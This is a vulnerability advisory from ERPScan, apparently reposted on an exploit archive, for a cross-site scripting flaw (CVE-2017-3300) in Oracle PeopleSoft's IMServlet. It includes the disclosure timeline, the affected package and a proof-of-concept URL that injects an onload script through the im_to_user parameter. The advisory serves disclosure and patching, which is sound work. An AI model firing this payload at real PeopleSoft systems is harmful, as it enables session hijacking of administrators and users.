Exploit for windows platform in category local exploits
Application: Oracle PeopleSoft
Vendor: Oracle
Bugs: XXS
Reported: 31.10.2016
Vendor response: 1.11.2016
Date of Public Advisory: 17.01.2017
Reference: Oracle CPU Jan 2017
Authors: Vahagn Vardanyan, Dmitry Yudin
1. ADVISORY INFORMATION
Title: Oracle PeopleSoft a XSS vulnerability
Advisory ID: [ERPSCAN-17-005]
Risk: High
Advisory URL:
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/
Date published: 17.01.2017
Vendor contacted: Oracle
2. VULNERABILITY INFORMATION
Class: XSS [CWE-79]
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2017-3300
CVSS Base Score: 6.1
3. VULNERABILITY DESCRIPTION
An attacker can use a special HTTP request to hijack session data of
administrators or users.
4. VULNERABLE PACKAGES
$ psreleaseinfo
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
PORTAL.war/WEB-INF/lib/mcfIM.jar
$ md5sum ./PORTAL.war/WEB-INF/lib/mcfIM.jar
36982c7d3c059ec9c2d9aaf0c35a65d3 ./PORTAL.war/WEB-INF/lib/mcfIM.jar
5. SOLUTIONS AND WORKAROUNDS
Oracle CPU January 2017
6. AUTHOR
Dmitri Yudin (@ret5et)/ERPScan & Vahagn Vardanyan (@vah_13 )/ERPScan
7. TECHNICAL DESCRIPTION
7.1. Proof of Concept
xss
http://localhost:8000/IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.location%29%27/%3E%3C/a%3E
8. REPORT TIMELINE
Reported: 31.10.2016
Vendor response: 1.11.2016
Date of Public Advisory: 17.01.2017
9. REFERENCES
http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/
# 0day.today [2018-01-01] #